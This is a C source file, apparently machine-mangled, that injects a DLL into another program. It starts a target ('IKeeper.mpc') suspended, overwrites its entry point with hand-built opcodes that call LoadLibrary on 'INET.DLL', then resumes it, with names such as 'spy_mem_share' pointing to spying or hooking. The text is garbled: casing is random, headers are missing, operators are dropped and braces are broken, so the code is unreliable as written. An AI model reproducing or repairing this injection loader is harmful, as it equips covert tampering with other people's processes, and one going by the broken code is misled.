#include
#include
#pragma comment (Lib, "ImageHLP.LIB")
#pragma pack (push, 1) typedef struct {BYTE int_PUSHAD; BYTE int_PUSH; DWORD push_Value; BYTE int_MOVEAX; DWORD eax_Value; WORD call_eax; BYTE jmp_MOVEAX; DWORD jmp_Value; WORD jmp_eax; char szDLL [MAX_PATH];} INJECT_LOADLIBRARY_CODE, * LPINJECT_CODE, INJECT_CODE; #pragma pack (pop, 1)
TypeDef struct {lpbyte lpentrypoint; // The entry address of the target process Byte OldCode [SizeOf (INJECT_CODE)]; // Code of the target process Save} spy_mem_share, * lpspy_mem_share;
Typedef struct {dword oddr; dword oldaddr; dword oldcode [4];} jmp_code, * lpjmp_code; static jmp_code _lpcode;
// Find the entry point process LPBYTE GetExeEntryPoint (char * filename) {PIMAGE_NT_HEADERS pNTHeader; DWORD pEntryPoint; PLOADED_IMAGE pImage; pImage = ImageLoad (filename, NULL); if (pImage == NULL) return NULL; pNTHeader = pImage-> FileHeader; pEntryPoint = Pntheader-> OptionalHeader.addressofentryPoint Pntheader-> OptionalHeader.ImageBase; Imageunload (PIMAGE);
Return (lpbyte) pentrypoint;
void jet (LPSTR szRunFile, LPSTR szMyDll) {STARTUPINFO stInfo = {sizeof (stInfo)}; PROCESS_INFORMATION m_proInfo = {0}; LPBYTE pEntryPoint; HANDLE hMap; SIZE_T cBytesMoved; LPSPY_MEM_SHARE lpMap; INJECT_CODE newCode;
CreateProcessa (0, Szrunfile, 0, 0, False, Create_suspended, 0, NULL, & STINFO, & M_PROINFO);
PENTRYPOINT = getExeentryPoint (Szrunfile); hmap = createfilemapping ((handle) 0xfffffff, null, page_readwrite, 0, sizeof (spy_mem_share), "mydllmapView");
lpMap = (LPSPY_MEM_SHARE) MapViewOfFile (hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0); ReadProcessMemory (m_proInfo.hProcess, pEntryPoint, & lpMap-> oldcode, sizeof (INJECT_CODE), & cBytesMoved); lpMap-> lpEntryPoint = pEntryPoint; lstrcpy (newCode. szDLL, szMyDll); newCode.int_PUSHAD = 0x60; newCode.int_PUSH = 0x68; newCode.int_MOVEAX = 0xB8; newCode.call_eax = 0xD0FF; newCode.jmp_MOVEAX = 0xB8; newCode.jmp_eax = 0xE0FF; newCode.eax_Value = (DWORD) & LoadLibrary; Newcode.push_value = (dword) (PentryPoint Offsetof (INJECT_CODE, SZDLL);
DWORD dwNewFlg, dwOldFlg; dwNewFlg = PAGE_READWRITE; VirtualProtectEx (m_proInfo.hProcess, (LPVOID) pEntryPoint, sizeof (DWORD), dwNewFlg, & dwOldFlg); WriteProcessMemory (m_proInfo.hProcess, pEntryPoint, & newCode, sizeof (newCode), NULL); // & dwrited; VirtualProtectex (M_Proinfo.hprocess, (LPVOID) Pentrypoint, Sizeof (DWORD), DWOLDFLG, & DWNEWFLG);
// Release Filemaping Note, not CloseHandle (HMAP) unmapViewOffile (LPMAP);
// Continue the running resumethread (m_Proinfo.hthread);}
// int apientry _twinmain (Hinstance Hinstance, Hinstance Hprevinstance, LPTSTR LPCMDLINE, INT NCMDSHOW) {JET ("IKeeper.mpc", "INET.DLL");
SLEEP (6000); Return 0;}
